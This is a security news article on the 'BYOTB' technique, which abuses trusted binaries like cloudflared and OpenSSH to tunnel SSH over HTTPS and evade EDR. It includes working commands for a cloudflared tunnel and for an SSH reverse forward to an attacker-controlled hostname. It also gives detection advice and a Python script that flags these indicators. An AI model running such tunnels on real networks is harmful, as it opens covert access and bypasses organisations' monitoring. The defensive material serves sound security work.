New ‘BYOTB’ Attack Exploits Trusted Binaries to Evade Detection, Researchers Reveal


Security researcher David Kennedy unveiled a novel attack technique known as “BYOTB” (Bring Your Own Trusted Binary) in a recent presentation at BSides London 2024, which leverages trusted binaries to bypass security measures and evade detection.

This approach exploits the trust placed in legitimate software by using it in adversarial ways, making it challenging for security systems to identify malicious activity.

The BYOTB attack focuses on using trusted binaries like Cloudflare’s cloudflared and OpenSSH to create covert communication channels.


SSH server running on Cloud VM (Source – JumpSec)

Experts at JumpSec Labs noted that these binaries are chosen because they are widely used and trusted, making them less likely to be flagged by security software.

Using Cloudflared for Covert Communication

One of the primary methods involves using cloudflared to tunnel SSH traffic over HTTPS on port 443, bypassing traditional SSH port 22 restrictions.

This is achieved by configuring cloudflared to act as a proxy for SSH connections, encapsulating the data as HTTPS traffic.

Cloudflare’s WARP client acts like a VPN (Source – JumpSec)

Here’s how it works:

  1. Set up a Cloudflare Tunnel: On a cloud VM (e.g., Kali), start a Cloudflare tunnel using:
   cloudflared tunnel run --token YourTokenHere
  2. Establish the SSH connection: On the target machine, use cloudflared as a proxy for SSH (the user name is a placeholder; the hostname is the one described below):
   ssh.exe -o ProxyCommand="cloudflared.exe access ssh --hostname %h" <user>@ssh.redteaming.org -R 1080

This command establishes an SSH connection through cloudflared, which forwards traffic to a controlled Cloudflare hostname (ssh.redteaming.org), ultimately reaching the SSH server on the Kali VM.

Cloudflared SSH Tunnel Setup (Source – JumpSec)

The BYOTB attack is designed to bypass Endpoint Detection and Response (EDR) systems like CrowdStrike and navigate through restrictive firewalls.

By using trusted binaries, attackers can avoid triggering alerts typically associated with malicious activity.

To defend against these attacks, organizations should implement several measures. Process telemetry should be monitored for command-line switches such as “tunnel” or “access” being passed to otherwise trusted binaries like cloudflared.

DNS logging should be used to track queries ending in “argotunnel.com”, which indicate cloudflared activity, and firewall policy should block unnecessary outbound traffic on port 7844.

Besides this, file monitoring is essential to track downloads of cloudflared binaries and verify their hashes against known-good values.
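As an added illustration (not code from the article or from JumpSec), the following Python script applies the four detection points above to a handful of constructed telemetry events; the approved hash, the token and the user name are placeholders, and the hostname is the one the article names.

```python
import re
from typing import Callable, Dict, List, Optional

# Placeholder allowlist: replace with the SHA-256 of the cloudflared build you approve.
KNOWN_GOOD_CLOUDFLARED_SHA256 = {"<sha256-of-approved-cloudflared-build>"}
# Switches the article names as indicators when passed to cloudflared.
TUNNEL_SWITCHES = re.compile(r"\b(tunnel|access)\b", re.IGNORECASE)

# Constructed sample telemetry, not real logs.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "cmdline": "cloudflared.exe tunnel run --token <token>"},
    {"type": "process", "cmdline": 'ssh.exe -o ProxyCommand="cloudflared.exe access ssh '
                                   '--hostname %h" <user>@ssh.redteaming.org -R 1080'},
    {"type": "process", "cmdline": "cloudflared.exe --version"},  # benign: no switch
    {"type": "dns", "query": "region1.v2.argotunnel.com"},
    {"type": "dns", "query": "www.example.com"},
    {"type": "firewall", "direction": "out", "dst_port": "7844"},
    {"type": "firewall", "direction": "out", "dst_port": "443"},
    {"type": "file", "path": r"C:\Users\u\Downloads\cloudflared.exe", "sha256": "<unexpected-hash>"},
]

def check_process(ev: Dict[str, str]) -> Optional[str]:
    # cloudflared itself, or an ssh ProxyCommand wrapping it, invoked with "tunnel"/"access"
    cmd = ev["cmdline"]
    if "cloudflared" in cmd.lower() and TUNNEL_SWITCHES.search(cmd):
        return "cloudflared tunnel/access switch: " + cmd
    return None

def check_dns(ev: Dict[str, str]) -> Optional[str]:
    if ev["query"].lower().endswith("argotunnel.com"):
        return "DNS query to argotunnel.com: " + ev["query"]
    return None

def check_firewall(ev: Dict[str, str]) -> Optional[str]:
    if ev["direction"] == "out" and ev["dst_port"] == "7844":
        return "outbound traffic on port 7844"
    return None

def check_file(ev: Dict[str, str]) -> Optional[str]:
    # A cloudflared binary appearing on disk whose hash is not on the approved list
    if ev["path"].lower().endswith("cloudflared.exe") and ev["sha256"] not in KNOWN_GOOD_CLOUDFLARED_SHA256:
        return "unapproved cloudflared binary written: " + ev["path"]
    return None

CHECKS: Dict[str, Callable[[Dict[str, str]], Optional[str]]] = {
    "process": check_process, "dns": check_dns, "firewall": check_firewall, "file": check_file}

def find_byotb_indicators(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert string per event that matches the article's detection advice."""
    return [hit for ev in events if (hit := CHECKS[ev["type"]](ev))]

if __name__ == "__main__":
    for alert in find_byotb_indicators(EVENTS):
        print("ALERT:", alert)
```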



